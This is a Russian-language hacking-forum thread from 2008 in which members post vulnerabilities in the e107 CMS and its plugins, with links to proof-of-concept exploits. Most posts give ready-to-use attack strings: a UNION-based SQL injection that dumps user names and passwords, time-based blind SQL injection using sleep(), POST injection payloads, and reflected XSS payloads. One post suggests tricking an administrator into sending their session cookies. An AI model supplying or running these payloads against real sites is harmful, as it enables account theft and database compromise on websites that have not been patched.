ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
24.10.2008, 23:51
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
e107 <= 0.7.13 (usersettings.php) Blind SQL Injection Exploit
Уязвимость вышла в свет 21 октября, 2008 © securitylab.ru
Уязвимость существует из-за недостаточной обработки входных данных в ключах массива "ue[]" в сценарии usersettings.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Сам эекслойт под неё:
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361578.php
Ну и вопрос, кто нибудь знает как закрыть дырку?
|
|
|
e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit |
29.10.2008, 05:53
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit
e107 Plugin EasyShop (category_id) Blind SQL Injection Exploit
Сплойт:
http://www.securitylab.ru/bitrix/exturl.php?goto=%2Fpoc%2Fextra%2F361979.php
|
|
|
|
SQL-инъекция в e107 Plugin lyrics_menu |
31.10.2008, 23:04
|
|
Участник форума
Регистрация: 03.06.2008
Сообщений: 111
Провел на форуме:
911872
Репутация:
36
|
|
SQL-инъекция в e107 Plugin lyrics_menu
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существует из-за недостаточной обработки входных данных в параметре «l_id» сценарием lyrics_song.php. Удаленный пользователь может с помощью специально сформированного запроса выполнить произвольные SQL команды в базе данных приложения.
Эксплоит:
PHP код:
http://localhost/script_path/lyrics_song.php?l_id=[SQL1] or [SQL2]
[SQL1] = column number 15
-1+union+select+1,concat(user_name,0x3a,user_password),3,4,5,6,7,8,9,10,11,12,13,14,15+from+e107_user--
|
|
|
|
30.11.2008, 23:01
|
|
Новичок
Регистрация: 30.11.2008
Сообщений: 2
Провел на форуме:
45110
Репутация:
5
|
|
Обнаружил кривую обработку смайлов. Возможна XSS-атака
Код:
!<script>alert(document.cookie);</script>
Версию e107 еще уточню. |
|
|
|
01.12.2008, 00:31
|
|
Members of Antichat - Level 5
Регистрация: 24.10.2007
Сообщений: 256
Провел на форуме:
6905523
Репутация:
1174
|
|
Уточняй, где конкертно возможно провести xss
Что - то мне подсказывает, что тестил ты под правами админа => там идет кривая обработка в функции фильтрации toDB.
|
|
|
|
15.12.2008, 00:31
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
Уязвимости модулей e107
 e107
1. Blind sqlInjection
Уязвимость в файле ban.php
Уязвимый кусок кода:
PHP код:
$unban = $_GET['accunban'];
if ( $unban ){
mysql_query("UPDATE $TABLE SET user_ban = '0' WHERE user_id = $unban");
} else {};
Из кода видно, что параметр $unban не обрамляется в кавычки и ранее нигде не фильтруется - это даёт нам возможность провести sql инъекцию.
Так же из кода видно, что данные в таблице обновляютса и не выводятся - это и есть причина слепоты в данной инъекции.
Exploit:
для версии 5: true: /e107_plugins/mam_menu/allaccess/unreg.php?accunban=1+and+if(SUBSTRING(VERSION(),1, 1)=5,1,sleep(4))=1
для версии 5: false: /e107_plugins/mam_menu/allaccess/unreg.php?accunban=1+and+if(SUBSTRING(VERSION(),1, 1)=4,1,sleep(4))=1
данний exploit будет работать только под версии >=5 (причина: визов ф-ции sleep), для более ранних версий надо использовать BENCHMARK
Скрипт для работы со слепыми инъекциями от Grey:
https://forum.antichat.ru/showpost.php?p=894169&postcount=5
Последний раз редактировалось eLWAux; 20.12.2008 в 18:01..
|
|
|
|
15.12.2008, 00:31
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
e107 Easy Members Search v1.0+ XSS
http://e107.org.ru/download.php?view.149
Уязвимый продукт: Easy Members Search v1.0+
Версия: v1.0+
Условия: magic quotes off
1. XSS
Уязвимость в файле ems.php
Уязвимый кусок кода:
PHP код:
$usrname = $_GET['usrname'];
.........
<input class='tbox' style='width:120px;' type='text' name='usrname' value='".$usrname."' /></td>
xss атаку можна произвести из за недостаточной фильтации в файлах class2.php и ems.php
Exploit:
/e107_plugins/ems/ems.php?usrname=test' />sa<b><b
/e107_plugins/ems/ems.php?usrname=test' /><script>alert('xss')</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script>
/e107_plugins/ems/ems.php?usrname=test' /><script>alert(/xss/)</script><b><b
|
|
|
|
15.12.2008, 00:32
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
e107 roll_mini v1.2 (каталог терминов) XSS
http://e107.org.ru/download.php?view.221
Уязвимый продукт: roll_mini (каталог терминов)
Версия: v1.2
Условия: magic quotes off
1. XSS
Уязвимость в файле roll.php
Уязвимый кусок кода:
PHP код:
if ($_GET['cat']) $id_cat = $_GET['cat']; else $id_cat = "1";
if ($_GET['search']) $search = $_GET['search'];
.........
<input class='tbox' type='hidden' name='cat' size='30' value='".$id_cat."' >
<input class='tbox' type='text' name='search' size='30' value='".$search."' >
xss атаку можна произвести из за отсуствия фильтации в файле roll.php
Exploit:
/e107_plugins/roll_mini/roll.php?cat=1aaaa<script>alert('xss')</script>
|
|
|
|
15.12.2008, 20:10
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
coppermine_menu (фотогаллерея) Blind sqlInj
http://web.wilan.com.ru/modules.php?name=Files&go=view_file&lid=115
Уязвимый продукт: coppermine_menu (фотогаллерея)
Версия: v0.3.3
Blind sqlInj
Уязвимость в файле util.php
Уязвимый кусок кода:
PHP код:
$action = $_POST['action'];
....
function filenametotitle($delete)
{
$albumid = $_POST['albumid'];
$parsemode = $_POST['parsemode'];
....
$query = "SELECT * FROM $picturetbl WHERE aid = '$albumid'";
$result = MYSQL_QUERY($query);
$num = mysql_numrows($result);
}
......
} else if ($action == 'title') { ....
filenametotitle(0); ..}
........
sqlInj атаку можна произвести из за отсуствия фильтации в POST запросе данних action, albumid
Exploit:
true: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='1&parsemode=2
false: \e107_plugins\coppermine_menu\util.php
POST: action=title&albumid=0' 1'='2&parsemode=2
|
|
|
|
15.12.2008, 21:02
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
EasyShop adminXSS
http://plugins.e107.org/e107_plugins/psilo/psilo.php?artifact.461
Уязвимый продукт: EasyShop
Условия: нужни права админа(єсли использовать СИ, то можно заставить админа отправить тебе свои куки..))
XSS
Уязвимость в файле admin_main_categories_edit.php
Уязвимый кусок кода:
PHP код:
..
} else if ($_GET['delete_main_category'] == '1') {
<a href='admin_main_categories_edit.php?delete_main_category=2&main_category_id=".$_GET['main_category_id']."'>".
...
задействовать только в совместимости с СИ
Exploit:
/e107_plugins/easyshop/admin_main_categories_edit.php?delete_main_categor y=1&main_category_id=1'><script>alert('xss')</script><a href='admin_main_categories_edit.php
/e107_plugins/easyshop/admin_main_categories_edit.php?delete_main_categor y=1&main_category_id=1'>XSS<temp class='a
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
